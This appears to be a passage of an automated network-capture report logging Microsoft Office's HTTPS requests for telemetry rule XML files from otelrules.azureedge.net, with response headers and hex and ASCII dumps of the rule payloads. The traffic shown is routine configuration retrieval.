                                  2024-11-12 15:42:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  44192.168.2.44979413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:07 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:07 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:07 GMT
                                  Content-Type: text/xml
                                  Content-Length: 494
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                  ETag: "0x8DC582BB8972972"
                                  x-ms-request-id: 0faddc02-601e-005c-51a5-34f06f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154207Z-17df447cdb5xwzjjhC1DFWz7vs000000018000000000c6ha
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:07 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  45192.168.2.44979813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:07 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                  ETag: "0x8DC582B92FCB436"
                                  x-ms-request-id: a5d3a887-701e-0050-40a7-346767000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-17df447cdb56mx55hC1DFWvbt400000009500000000032q9
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  46192.168.2.44979913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:08 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 423
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                  ETag: "0x8DC582BB7564CE8"
                                  x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-16547b76f7fkcrm9hC1DFWxdag0000000g1g000000000skz
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  47192.168.2.44980013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:08 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 478
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                  ETag: "0x8DC582B9B233827"
                                  x-ms-request-id: aa8338a3-a01e-0021-72a2-34814c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-17df447cdb5wrr5fhC1DFWte8n0000000cng00000000a1rx
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  48192.168.2.44980113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:09 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 404
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                  ETag: "0x8DC582B95C61A3C"
                                  x-ms-request-id: 74ac5a2e-001e-0066-5da0-34561e000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-15869dbbcc6lxrkghC1DFWbkxg00000000dg0000000024y3
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  49192.168.2.44980313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:09 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                  ETag: "0x8DC582BB046B576"
                                  x-ms-request-id: 5703d523-f01e-005d-32a0-3413ba000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-15869dbbcc6qwghvhC1DFWw7e8000000014g00000000d3cr
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  50192.168.2.44980413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:09 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 400
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                  ETag: "0x8DC582BB2D62837"
                                  x-ms-request-id: 510f0f50-601e-0050-05a5-342c9c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-15869dbbcc6lq2lzhC1DFWs1sn00000001wg00000000fawh
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  51192.168.2.44980513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:09 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:09 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:09 GMT
                                  Content-Type: text/xml
                                  Content-Length: 479
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                  ETag: "0x8DC582BB7D702D0"
                                  x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154209Z-16547b76f7f7jnp2hC1DFWfc300000000fzg000000000r60
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:09 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  52192.168.2.44980613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:09 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:10 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:10 GMT
                                  Content-Type: text/xml
                                  Content-Length: 425
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                  ETag: "0x8DC582BBA25094F"
                                  x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154210Z-16547b76f7f22sh5hC1DFWyb4w0000000fq000000000hzza
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:10 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  53192.168.2.44980813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:10 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:10 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:10 GMT
                                  Content-Type: text/xml
                                  Content-Length: 448
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB389F49B"
                                  x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154210Z-16547b76f7fj5p7mhC1DFWf8w40000000fw000000000ksbz
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:10 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  54192.168.2.44980913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:10 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:10 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:10 GMT
                                  Content-Type: text/xml
                                  Content-Length: 491
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B98B88612"
                                  x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154210Z-16547b76f7fdtmzhhC1DFW6zhc00000004qg00000000dn8e
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
